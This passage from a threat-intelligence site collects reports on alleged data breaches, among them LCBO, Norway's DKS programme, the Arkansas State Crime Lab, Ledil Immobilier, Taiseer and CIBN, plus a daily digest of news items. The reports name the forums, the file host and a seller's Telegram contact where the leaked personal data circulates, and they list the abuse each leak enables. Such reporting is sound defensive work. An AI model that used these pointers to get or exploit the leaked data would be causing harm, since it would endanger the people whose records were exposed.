account types. High risk of targeted phishing, alcohol-themed scams, and impersonation campaigns against verified Canadian consumers. API Access Available Threat intelligence endpoints, ransomware feeds, and IOC data for programmatic integration. [View Details ](https://darkwebinformer.com/api-details/) Premium Intelligence ## Real-time breach tracking, primary-source evidence, and expert analysis. Built for security professionals, researchers, and journalists. Unlock the complete threat feed, ransomware feed, and original claim URLs. [Subscribe ](https://darkwebinformer.com/pricing) 01 ## Incident Summary Date & Time2026-04-27 17:35 UTC Threat ActorSpirigatito VictimLCBO (lcbo.com) OperatorGovernment of Ontario IndustryGovernment / Alcohol Retail CategoryData Breach Affected Customers165,840 ScopeCustomer Database Account TypeRetail Customer Distribution8 forum points NetworkOpen Web Country Canada 02 ## Incident Overview A threat actor going by **Spirigatito** has posted a leak of **LCBO** (Liquor Control Board of Ontario) on a public cybercrime forum, signing the post "Breached by @👑 Spirigatito" and addressing the forum community directly with the line "Today I am leaking LCBO database." LCBO is a Crown corporation owned by the Government of Ontario, established in 1927 following the end of provincial prohibition, and serves as the primary retail and wholesale channel for beverage alcohol in Canada's most populous province. With more than 670 retail stores plus a national e-commerce platform at lcbo.com, LCBO is one of the largest single buyers and retailers of alcohol in the world. The listing describes the victim as "the official e-commerce and information platform for the Liquor Control Board of Ontario." According to the listing, the breach affects **165,840 customers**, with the seller stating that each record contains the following six fields: Account ID, First Name, Last Name, Email, Phone, and Account Type. The published JSON sample confirms this schema and reveals the following data categories: - **Account Identifiers**UUID-format accountId values that map each customer record to LCBO's internal account system, plus a "Customer" accountType label confirming these are retail consumer accounts rather than corporate or licensee accounts. - **Full Names**First and last names in plain text, with capitalisation inconsistencies suggesting raw user input rather than normalised fields. - **Email Addresses**Personal email addresses across major Canadian webmail providers. - **Phone Numbers**10-digit North American phone numbers, with the area-code distribution consistent with Ontario coverage. While the dataset is narrower than a financial breach (no payment card data, addresses, or order histories visible in the sample), the combination of **name, email, and phone number tied to a verified LCBO customer account** is highly weaponisable on its own. The data immediately enables targeted phishing campaigns referencing real LCBO branding, fraudulent loyalty-points or refund scams, and SIM-swap attempts using the phone numbers as starting points. 03 ## Compromised Data Categories Account UUIDs First Names Last Names Email Addresses Phone Numbers Account Type Ontario Customer Records 04 ## Screenshots [ ![Forum listing titled LCBO Database Leaked Download by Spirigatito with GOD rank, 432 reputation, large LCBO branding and 165840 customer count](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9283759827346879256982569872365987235.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9283759827346879256982569872365987235.png) FIG 01 · Forum listing header by Spirigatito with LCBO branding and 165,840 customer claim [ ![Sample records published in the listing showing the schema of the leaked LCBO customer database](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9283759827346879256982569872365987236.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9283759827346879256982569872365987236.png) FIG 02 · Sample records published by the actor (redacted in viewer) _This post is for subscribers on the Plus, Pro and Elite tiers only._ ### Den kulturelle skolesekken (DKS) Database Breached: 1,389,534 Records Exposed from Norway's National Cultural-Schoolbag Programme URL: https://darkwebinformer.com/den-kulturelle-skolesekken-dks-database-breached-1-389-534-records-exposed-from-norways-national-cultural-schoolbag-programme/ Last updated: 2026-04-27T16:10:20.000Z Active Threat Report ID: DWI-2026-0427-02 Threat Intelligence Report # Den kulturelle skolesekken (DKS) Database Breached: 1,389,534 Records Exposed from Norway's National Cultural-Schoolbag Programme A threat actor operating under the alias **Spirigatito** has released the database of **Den kulturelle skolesekken** (DKS, "The Cultural Schoolbag"), a national Norwegian government programme run by the Ministry of Culture agency **Kulturtanken** that delivers professional arts and culture experiences to every school pupil in Norway. The listing claims three breaches with **1,389,534 rows** in total, including PII, internal county-council communications, and full programme planning records. Published Apr 27, 2026 · 17:34 UTC Origin Norway Sector Government / Culture & Education Read Time 7 min Critical Severity A breach of **Norway's national cultural-schoolbag programme** serving every school pupil in the country, with **1,389,534 rows** spanning PII, internal county-council messages, and programme planning data. High risk of targeted social engineering against Norwegian government employees, performers, and school administrators across every fylkeskommune. API Access Available Threat intelligence endpoints, ransomware feeds, and IOC data for programmatic integration. [View Details ](https://darkwebinformer.com/api-details/) Premium Intelligence ## Real-time breach tracking, primary-source evidence, and expert analysis. Built for security professionals, researchers, and journalists. Unlock the complete threat feed, ransomware feed, and original claim URLs. [Subscribe ](https://darkwebinformer.com/pricing) 01 ## Incident Summary Date & Time2026-04-27 17:34 UTC Threat ActorSpirigatito VictimDen kulturelle skolesekken (DKS) OperatorKulturtanken IndustryGovernment / Culture & Education CategoryData Breach Total Rows1,389,534 Datasets3 separate breaches Distribution4 forum points NetworkOpen Web Country Norway 02 ## Incident Overview A threat actor going by **Spirigatito** has posted a leak of **Den kulturelle skolesekken** (DKS, "The Cultural Schoolbag") on a public cybercrime forum, signing the post "Breached by @👑 Spirigatito" and addressing the forum community directly with the line "Today I am leaking DenKulturelles database." DKS is one of the largest national cultural-policy programmes in the world, established in 2001 and operated by the Ministry of Culture agency **Kulturtanken** (Arts for Young Audiences Norway) since 2016\. The programme delivers professional film, literature, music, performing arts, visual arts, and cultural-heritage experiences to **every school pupil in Norway** from first grade through year 3 of upper secondary, in cooperation with all county councils (fylkeskommune) and municipalities (kommune). According to the listing, three breaches affect **1,389,534 rows in total**, distributed across three structurally distinct datasets. Each is represented by a JSON sample in the forum post. The data categories exposed include: - **User & Performer Records**Approximately one million rows containing id, is\_performer flag, performer\_branch\_office\_ids, first\_name, last\_name, email, phone\_number\_formatted, address (postal\_code, locality, street), nationality (NO, SE), and language code (nb for Norwegian Bokmål). Visible sample emails span Norwegian county-council domains including telemarkfylke.no, vtfk.no (Vestfold Telemark), and bergen.kommune.no, alongside private addresses on hotmail.com and monlyse.org. - **Internal Communications**Full message bodies between DKS coordinators and county-level cultural officers, with sender\_user\_name, sender\_name (e.g. "Agder fylkeskommune", "Vestland fylkeskommune", "Nordland fylkeskommune", "Oslo kommune", "Kristiansand kommune"), recipients\_stringified, subject lines, content\_text, topic\_id, related\_entity\_ids, branch\_office\_id, and Unix time\_sent\_int timestamps from 2023. - **Programme & Tour Planning**Records for individual cultural productions including cultural\_institution\_name (e.g. Vestfoldmuseene, Vikinggården på Borre), production names (Vitsen med GRENSER, VGS-bestilling 26/27, Mia har forlatt chatten), branch\_office\_id, performer\_count, tour\_staff\_count, budget\_total / budget\_tour / budget\_development, year\_level\_minimum / year\_level\_maximum (school grades), program\_seasons (e.g. "Høst 2026, Vår 2027"), location\_type, and is\_published / is\_deleted flags. - **Tour Logistics & Travel Quotes**Fragments of internal correspondence visible in the sample reference detailed travel logistics including flight quotes (Bergen to Sandefjord, kr 2480 and kr 3079) and tour scheduling for cultural productions across multiple Norwegian counties. The sample data is internally coherent: phone numbers carry the Norwegian +47 country code, addresses include real postal codes for Skien (3736), Bø i Telemark (3801), Porsgrunn (3912), and other Norwegian locations, and the references to fylkeskommune and kommune entities map to the actual administrative divisions of Norway. The intermingling of **government employee PII, private citizen contact details, and rich internal communications** makes this a high-impact incident for Kulturtanken specifically and for any of the eleven Norwegian county councils whose DKS coordinators appear in the dataset. 03 ## Compromised Data Categories Full Names Email Addresses Phone Numbers (+47) Postal Addresses Nationality Performer Records Internal Messages Sender / Recipient Mapping Programme Names Cultural Institution IDs Tour Schedules Budget Figures School Year Targeting Branch Office IDs 04 ## Screenshots [ ![Forum listing titled Government of Norway DenKulturelles Database Leaked Download by Spirigatito with GOD rank, 432 reputation, Den kulturelle skolesekken DKS logo and 1389534 row count](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/27835699872635987263549872469874235.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/27835699872635987263549872469874235.png) FIG 01 · Forum listing header by Spirigatito with DKS branding [ ![JSON sample records showing Norwegian user PII with telemarkfylke.no, vtfk.no, and bergen.kommune.no email addresses, +47 phone numbers, postal codes 3736, 3801, 3912, plus internal messages from Agder fylkeskommune, Vestland fylkeskommune, Nordland fylkeskommune](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/27835699872635987263549872469874236.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/27835699872635987263549872469874236.png) FIG 02 · User PII samples with vtfk.no/telemarkfylke.no domains and county-council messages [ ![JSON sample of cultural production records showing Vestfoldmuseene, Vikinggården på Borre, VGS-bestilling 26/27, year_level_minimum and year_level_maximum, budget_total, performer_count, program_seasons Høst 2026 Vår 2027, primary_cultural_expression Litteratur Film Kulturarv](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/27835699872635987263549872469874237.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/27835699872635987263549872469874237.png) FIG 03 · Programme planning records with cultural institutions, budgets, and 2026/2027 seasons _This post is for subscribers on the Plus, Pro and Elite tiers only._ ### Arkansas State Crime Lab Database Breached: Threat Actor kittykatkrew Leaks Court Calendars and Law Enforcement Personnel Directory URL: https://darkwebinformer.com/arkansas-state-crime-lab-database-breached-threat-actor-kittykatkrew-leaks-court-calendars-and-law-enforcement-personnel-directory/ Last updated: 2026-04-23T17:47:23.000Z Active Threat Report ID: DWI-2026-0423-01 Threat Intelligence Report # Arkansas State Crime Lab Database Breached: Threat Actor kittykatkrew Leaks Court Calendars and Law Enforcement Personnel Directory A threat actor operating under the alias **kittykatkrew** has released a database attributed to the **Arkansas State Crime Laboratory** (crimelab.arkansas.gov), the forensic science agency operating under the Arkansas Department of Public Safety. The listing claims the compromise was carried out via the agency's web portal at **lasso.crimelab.arkansas.gov** and publishes a download link containing two datasets: a complete court calendar with active case details and a full personnel directory of law enforcement and municipal officials with portal access. Published Apr 23, 2026 · 19:02 UTC Origin United States (Arkansas) Sector Government / Law Enforcement Read Time 6 min Critical Severity A breach of a **US state forensic science agency**, exposing active criminal case calendars (defendants, court dates, forensic analyst assignments) and a personnel directory of prosecutors, police, and city officials with portal credentials. High risk of case tampering, witness intimidation, and targeted social engineering against law enforcement personnel. API Access Available Threat intelligence endpoints, ransomware feeds, and IOC data for programmatic integration. [View Details ](https://darkwebinformer.com/api-details/) Premium Intelligence ## Real-time breach tracking, primary-source evidence, and expert analysis. Built for security professionals, researchers, and journalists. Unlock the complete threat feed, ransomware feed, and original claim URLs. [Subscribe ](https://darkwebinformer.com/pricing) 01 ## Incident Summary Date & Time2026-04-23 19:02 UTC Threat Actorkittykatkrew VictimArkansas State Crime Lab Domaincrimelab.arkansas.gov IndustryGovernment / Law Enforcement CategoryData Breach Entry Pointlasso.crimelab.arkansas.gov ScopeCourt Calendar + Personnel Record CountUndisclosed DistributionFree Download File Hostbiteblob.com Archive Format.rar Forumspear.cx NetworkOpen Web StateArkansas Country United States 02 ## Incident Overview A threat actor going by **kittykatkrew** has posted a breach of the **Arkansas State Crime Laboratory** on the cybercrime forum **spear.cx**. The Arkansas State Crime Lab is the state's primary forensic science agency, established in 1977 and placed under the Arkansas Department of Public Safety in 2019, with a main facility in Little Rock and regional laboratories in Lowell and Hope. The agency provides forensic pathology, toxicology, DNA, firearms, latent fingerprint, drug analysis, and digital evidence services to all state and federal law enforcement agencies operating in Arkansas, and is staffed by roughly 144 personnel. According to the listing, the compromise was achieved through the agency's public-facing web portal at **lasso.crimelab.arkansas.gov**. The actor states that two distinct datasets were exfiltrated, and each is represented by a sample in the forum post. The data categories exposed include: - **Complete Court Calendar**Case details (case numbers in 42BCR-25-61-style format, internal tracking IDs), defendant names, court dates, courtroom numbers, forensic analyst assignments, approval status, and prosecutor contact information. - **Full Personnel Directory**Names, email addresses, phone numbers, job titles, and employing agencies for every portal user. - **Account Status Metadata**Administrative flags indicating which accounts are approved, rejected, or locked out, along with the most recent login timestamps for each user, which would allow an attacker to identify active versus dormant credentials. - **Agency Mapping**The "agency" field in the personnel directory enumerates the full roster of Arkansas municipal, county, and state law enforcement and prosecutorial offices that hold LASSO portal access, producing a de facto map of the state's criminal justice IT footprint. The exposure of active court-calendar data is the most severe element of this leak. Unlike a consumer PII breach, the dataset effectively publishes a **schedule of upcoming criminal proceedings with the names of defendants, prosecutors, and the specific forensic analysts assigned to each case**, creating tangible risks of witness or analyst intimidation, evidence or case tampering, and targeted social engineering in the window before a given court date. The personnel directory compounds the risk by providing verified contact paths (work emails, direct phone numbers, and authorised-user status) for prosecutors, police officials, and city attorneys across Arkansas, which is an ideal starting point for business-email-compromise, fake subpoena, or impersonation attacks. 03 ## Compromised Data Categories Active Case Numbers Defendant Names Court Dates Courtroom Numbers Forensic Analyst Assignments Prosecutor Names & Emails Law Enforcement Directory Work Email Addresses Direct Phone Numbers Job Titles Employing Agencies Account Status Flags Last Login Timestamps 04 ## Screenshots [ ![spear.cx forum listing titled ARKANSAS STATE CRIME LAB with breach description, kittykatkrew profile, and court calendar sample row showing analyst and prosecutor data](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/978235698723659872364987235698234968732.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/978235698723659872364987235698234968732.png) FIG 01 · spear.cx listing by kittykatkrew with court calendar sample [ ![Personnel directory JSON sample with firstName, lastName, jobTitle City Attorney, phoneNumber, isApproved, isLockedOut, lastLogin fields, and biteblob.com download URL](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/978235698723659872364987235698234968733.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/978235698723659872364987235698234968733.png) FIG 02 · Personnel directory JSON sample and biteblob.com download URL _This post is for subscribers on the Plus, Pro and Elite tiers only._ ### Ledil Immobilier (ledil.immo) Database Breached: Threat Actor 888 Leaks 6,700 French Real Estate User Records URL: https://darkwebinformer.com/ledil-immobilier-ledil-immo-database-breached-threat-actor-888-leaks-6-700-french-real-estate-user-records/ Last updated: 2026-04-21T17:52:06.000Z Active Threat Report ID: DWI-2026-0421-01 Threat Intelligence Report # Ledil Immobilier (ledil.immo) Database Breached: Threat Actor 888 Leaks 6,700 French Real Estate User Records A threat actor operating under the alias **888** has released the complete database of **Ledil Immobilier** (ledil.immo), a French real estate mandataire network founded in Agen in 2012 with more than 2,000 listed properties. The listing on darkforums.su claims the breach occurred in April 2026 and exposes **6,700 unique user records** covering acquéreurs (buyers), mandataires (agents), notaires, and property intervenants. The archive is offered as a free download to registered forum members. Published Apr 21, 2026 · 19:24 UTC Origin France Sector Real Estate / Mandataire Network Read Time 6 min Critical Severity A full database dump of a French real estate network with **6,700 unique user records**, including names, emails, phone numbers, addresses, property transaction data, and professional identifiers for notaires and mandataires. Distributed as a **free download on darkforums.su**, maximising exposure. High risk of targeted fraud against buyers, sellers, and agents. API Access Available Threat intelligence endpoints, ransomware feeds, and IOC data for programmatic integration. [View Details ](https://darkwebinformer.com/api-details/) Premium Intelligence ## Real-time breach tracking, primary-source evidence, and expert analysis. Built for security professionals, researchers, and journalists. Unlock the complete threat feed, ransomware feed, and original claim URLs. [Subscribe ](https://darkwebinformer.com/pricing) 01 ## Incident Summary Date & Time2026-04-21 19:24 UTC Threat Actor888 VictimLedil Immobilier (ledil.immo) IndustryReal Estate / Mandataire CategoryData Breach Unique Records6,700 Breach Date (claimed)April 2026 ScopeFull Database DistributionFree Download AccessForum Registration PlatformDrupal (Search API) Forumdarkforums.su NetworkOpen Web Country France 02 ## Incident Overview A threat actor going by **888** has posted the full database of **Ledil Immobilier** (ledil.immo) on a popular cybercrime forum. Ledil Immobilier is a French real estate mandataire network founded in 2012 by Katia and Laurent Baron in Agen (Lot-et-Garonne, Nouvelle-Aquitaine) and operating nationally with more than 2,000 property listings across houses, apartments, land, and investments. The actor describes the company as "a pioneering network of free real estate agents" and states the breach occurred in **April 2026**. According to the listing, the dataset contains **6,700 unique user records**. The exposed schema visible in the compromised-data list and sample rows is consistent with a full export from Ledil's internal business tool, which appears to run on **Drupal with the Search API** (fields include search\_api\_solr, drupal\_X2f\_langcode, and entity:acquereur references). The data categories exposed include: - **Acquéreur (Buyer) Records**Full names, email addresses, telephone numbers, addresses, nationalities, and search criteria tied to individual prospective buyers registered in Ledil's CRM. - **Mandataire & Agent Data**Agent user IDs, names, emails, and telephone numbers for Ledil's network of mandataires, along with sector assignments and postal codes of their working zones. - **Notaire & Intervenant Details**Identifiers for notaires and other transaction intervenants, with linkages to specific property files and mandates. - **Property (Bien) Records**Property prices, descriptions, locations (commune, département), surface areas, legal statuses, number of rooms, energy categories, commercial status, and offer-type metadata. - **Transaction Metadata**Honoraires (agent fees), mandate document numbers, boost and highlight flags, creation and update timestamps, message logs, and internal statuses for each listing. The sample rows published by the actor include real French email addresses across commonly-used domains (wanadoo.fr, hotmail.fr, and corporate addresses such as amann-kaffee.at), first names, and Drupal entity URLs pointing to **enterprise1.ledil.immo**, suggesting the leak originates from an internal staging or production instance of Ledil's mandataire platform rather than from a public website. Transaction timestamps in the visible sample cluster around late 2025, consistent with the claimed April 2026 breach date. The fact that the dataset is being distributed **at no cost**, only gated behind basic forum registration, maximises exposure and makes retroactive containment impractical. 03 ## Compromised Data Categories Full Names Email Addresses Telephone Numbers Home Addresses Nationalities Acquéreur Search Criteria Mandataire IDs Notaire Identifiers Property Prices Property Addresses Agent Fees (Honoraires) Mandate Numbers Transaction Timestamps Drupal Entity URLs 04 ## Screenshots [ ![Forum post on darkforums.su titled Ledil Immobilier Database Leaked Download with breach details and 888 actor profile](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/348962348572359876235968792837652.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/348962348572359876235968792837652.png) FIG 01 · darkforums.su listing by 888 announcing the Ledil breach [ ![Sample rows from the leak showing French email addresses, Drupal Search API fields, entity:acquereur URLs, and transaction dates](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/348962348572359876235968792837653.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/348962348572359876235968792837653.png) FIG 02 · Sample records: French emails, Drupal fields, enterprise1.ledil.immo URLs _This post is for subscribers on the Plus, Pro and Elite tiers only._ ### Daily Dose of Dark Web Informer - April 20th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-april-20th-2026/ Last updated: 2026-04-20T21:39:59.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **75,300+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 75.3k Unique Visitors 154.1k Pageviews Last 30 days as of Mar 30, 2026\. Next update Apr 30th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Threat Intelligence ❗️ [Chartered Institute of Bankers of Nigeria (CIBN) Database Breached: 250GB Including Member PII, Source Code, and ID Documents Leaked](#) FREE ❗️ [Taiseer (taiseer.co) Database Breached: Threat Actor Sorb Offering PII of Egyptian Gold Investors for Sale](#) FREE X/Twitter Updates ❗️ [SSEDOMEX (Secretaría de Seguridad del Estado de México), the public security ministry of Mexico's most populous state, has allegedly had a decade of 911 and 089 emergency call records put up for sale on a popular cybercrime forum at $1,200 USD.](https://x.com/DarkWebInformer/status/2046235004963881435?s=20) ❗️ [Emaar Properties and Select Group, two major Dubai based real estate developers, have allegedly had owner and rental information from their servers put up for sale on a popular cybercrime forum at $8,000 USD for both datasets combined.](https://x.com/DarkWebInformer/status/2046237613510558137?s=20) ❗️ [INSS (Institute for National Security Studies), Israel's leading national security think tank, affiliated with Tel Aviv University, has allegedly suffered an unauthorized access of its internal research environment, with a claimed 15.92 TB archive put up for sale on a](https://x.com/DarkWebInformer/status/2046240568750084321?s=20) ❗️ [Agoda (http://agoda.com), a Booking Holdings owned travel platform, has allegedly had 82 million customer records associated with Malaysian users put up for sale on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2046243622064980259?s=20) ❗️ [The Gobernación del Valle del Cauca (Colombia), specifically the SAR (Sistema Administrador de Recaudo Departamental) server at http://serveriissar.valledelcauca.gov.co, has allegedly suffered an unauthorized access, with the data put up for sale on a popular cybercrime forum at $500 USD.](https://x.com/DarkWebInformer/status/2046249096424353985?s=20) ❗️ [Vercel Breach Traced to Suspected February Infostealer Infection at Context.ai](https://x.com/DarkWebInformer/status/2046249882705424395?s=20) ❗️ [A threat actor identified as SCTH is allegedly selling a database purportedly belonging to SGK Türkiye (Turkish Social Security Institution) containing over 20 million records.](https://x.com/DarkWebInformer/status/2046255371308724729?s=20) ❗️ [Lovable has allegedly been breached, all the details.](https://x.com/DarkWebInformer/status/2046259622822977611?s=20) ❗️ [Scattered Spider member, Tyler Robert Buchanan, 24, of Dundee, Scotland, pleaded guilty to one count of conspiracy to commit wire fraud and one count of aggravated identity theft.](https://x.com/DarkWebInformer/status/2046303794540208503?s=20) ❗️ [Citizens Bank has been claimed a victim to Everest Ransomware](https://x.com/DarkWebInformer/status/2046315926866493531?s=20) ❗️ [Frost Bank has been claimed a victim to Everest Ransomware](https://x.com/DarkWebInformer/status/2046317139556958390?s=20) ❗️ [Cooperativa de Hospitales de Antioquia - COHAN has been claimed a victim to Qilin Ransomware](https://x.com/DarkWebInformer/status/2046318100434526340?s=20) ❗️ [Qilin Ransomware Claims 4 companies below as victims:](https://x.com/DarkWebInformer/status/2046320598951895444?s=20) 💡 [BlueSky's Status page has been suspended by UptimeRobot.](https://x.com/DarkWebInformer/status/2046329531162611857?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Taiseer (taiseer.co) Database Breached: Threat Actor Sorb Offering PII of Egyptian Gold Investors for Sale URL: https://darkwebinformer.com/taiseer-taiseer-co-database-breached-threat-actor-sorb-offering-pii-of-egyptian-gold-investors-for-sale/ Last updated: 2026-04-20T20:34:15.000Z Active Threat Report ID: DWI-2026-0420-25 Threat Intelligence Report # Taiseer (taiseer.co) Database Breached: Threat Actor Sorb Offering PII of Egyptian Gold Investors for Sale A threat actor operating under the alias **Sorb** is selling the database of **Taiseer** (taiseer.co), the Egyptian Sharia-compliant fractional gold-savings fintech. The listing claims **71,000 user records** with full names, emails, phone numbers, **bcrypt password hashes**, addresses, gold balances, and **27,000 national ID card records** with scanned front-and-back images — offered for **$400 with escrow**. Published Apr 20, 2026 · 21:54 UTC Origin Egypt Sector Fintech / Gold Investment Read Time 6 min Critical Severity **71,000 investor records** from Egypt's Sharia-compliant fractional gold-savings platform, including bcrypt password hashes, 27,000 national ID scans, and per-user gold balances. The seller also claims continued access to the environment. High risk of account takeover, identity theft, and targeted fraud against high-balance holders. API Access Available Threat intelligence endpoints, ransomware feeds, and IOC data for programmatic integration. [View Details ](https://darkwebinformer.com/api-details/) Premium Intelligence ## Real-time breach tracking, primary-source evidence, and expert analysis. Built for security professionals, researchers, and journalists. Unlock the complete threat feed, ransomware feed, and original claim URLs. [Subscribe ](https://darkwebinformer.com/pricing) 01 ## Incident Summary Date & Time2026-04-20 21:54 UTC Threat ActorSorb VictimTaiseer (taiseer.co) IndustryFintech / Gold Investment CategoryData Breach Total Users71,000 ID Cards27,000 Unique Emails71,000 Unique Phones71,000 Price$400 USD EscrowYes AccessOngoing Forumspear.cx Contactt.me/sorblines NetworkOpen Web Country Egypt 02 ## Incident Overview A threat actor going by **Sorb** is selling a database attributed to **Taiseer** (taiseer.co), a Cairo-based fintech founded in 2023 and headquartered at the Nile University campus. Taiseer operates a Sharia-compliant mobile app that lets Egyptian savers buy investment-grade gold in fractions, describing itself in its own marketing as "the first digital platform for saving in gold." According to the post, the dataset contains **71,000 user records** with 71,000 unique emails, 71,000 unique phone numbers, and **27,000 unique national ID card records**. Sample rows published by the actor confirm the following schema and data categories: - **Core Account Data**Full names (in Arabic script), email addresses, Egyptian mobile numbers (002012 prefix), bcrypt password hashes, and Firebase Cloud Messaging (FCM) push tokens tied to individual devices. - **KYC Identity Records**Egyptian national ID numbers (14-digit format), ID photo front and back filenames, nationality, residence country, and city — 27,000 verified identities in total. - **Demographic Data**Gender, date of birth (sample DOBs span 1947–1999), job title (Marketing Consultant, Product Designer, banker, engineer, graphic designer, application designer, among others), and home address. - **Financial & Gold Balances**Current gold balances, out-balance, current and reserved gold shares, referral data, transaction history, and account timestamps for created\_at and updated\_at events. - **Administrative Flags**Admin verification status, rejection reasons, basic-info flags, and referral link IDs — the internal fields a full database dump would expose to a buyer attempting to identify high-value or recently onboarded accounts. The listing is priced at **$400 USD with escrow available**, and the actor notes that buyer access "does not affect the price" — language that the seller interprets as indicating ongoing or retained access to the source environment rather than a one-off dump. The actor directs interested buyers to **t.me/sorblines** for contact and advertises a broader data-leak channel at t.me/totaldataleaks. The combination of **bcrypt password hashes, scanned national ID cards, and per-user gold balances** is the most damaging element: it pairs an account takeover vector (via hash cracking or credential stuffing against other services) with verified identity documents suitable for KYC-bypass fraud, and a known target value in physical gold. For a platform of Taiseer's size, this represents effectively the entire customer base. 03 ## Compromised Data Categories Full Names Email Addresses Phone Numbers Bcrypt Password Hashes National ID Numbers ID Photo Scans (Front/Back) Home Addresses Date of Birth Gender Job Titles Gold Balances Gold Shares Transaction History FCM Push Tokens Referral Data 04 ## Screenshots [ ![Sorb forum listing header titled EGYPT TAISEER.CO GOLD INVESTORS with Taiseer homepage screenshot](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/235798623985769283756987235698721598712.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/235798623985769283756987235698721598712.png) FIG 01 · spear.cx listing header and seller profile (Sorb, Leaksmaster) [ ![Listing details: 71,000 users, 27,000 ID cards, bcrypt hashes, address, job, balances — priced at $400 with escrow](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/235798623985769283756987235698721598713.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/235798623985769283756987235698721598713.png) FIG 02 · Listing body — volumes, field list, $400 price, escrow, Telegram contact [ ![Sample KYC table from leak with id_number, address, job, gender, date_of_birth, nationality, id_photo_front, id_photo_back fields](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/235798623985769283756987235698721598714.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/235798623985769283756987235698721598714.png) FIG 03 · KYC/ID-verification sample — id\_number, job, gender, DOB, photo filenames [ ![Sample users table with bcrypt password hashes, FCM tokens, current_balance, current_gold_shares, and admin verification flags](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/235798623985769283756987235698721598715.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/235798623985769283756987235698721598715.png) FIG 04 · Users table sample — bcrypt hashes, FCM tokens, gold shares, admin flags _This post is for subscribers on the Plus, Pro and Elite tiers only._ ### Chartered Institute of Bankers of Nigeria (CIBN) Database Breached: 250GB Including Member PII, Source Code, and ID Documents Leaked URL: https://darkwebinformer.com/chartered-institute-of-bankers-of-nigeria-cibn-database-breached-250gb-including-member-pii-source-code-and-id-documents-leaked/ Last updated: 2026-04-20T20:36:23.000Z Active Threat Report ID: DWI-2026-0420-24 Threat Intelligence Report # Chartered Institute of Bankers of Nigeria (CIBN) Database Breached: 250GB Including Member PII, Source Code, and ID Documents Leaked A threat actor operating under the alias **Rabid** is offering the complete 250GB database of the Chartered Institute of Bankers of Nigeria (CIBN), Nigeria's apex professional banking body. The leak reportedly includes member names, email addresses, membership details, source code, and scanned ID documents and academic certificates. Published Apr 20, 2026 · 20:14 UTC Origin Nigeria Sector Banking / Professional Association Read Time 6 min Critical Severity **250GB** of data exposing members of Nigeria's chartered banking body, including scanned identity and academic documents alongside platform source code. High risk of identity theft, credential fraud, and follow-on intrusion. API Access Available Threat intelligence endpoints, ransomware feeds, and IOC data for programmatic integration. [View Details ](https://darkwebinformer.com/api-details/) Premium Intelligence ## Real-time breach tracking, primary-source evidence, and expert analysis. Built for security professionals, researchers, and journalists. Unlock the complete threat feed, ransomware feed, and original claim URLs. [Subscribe 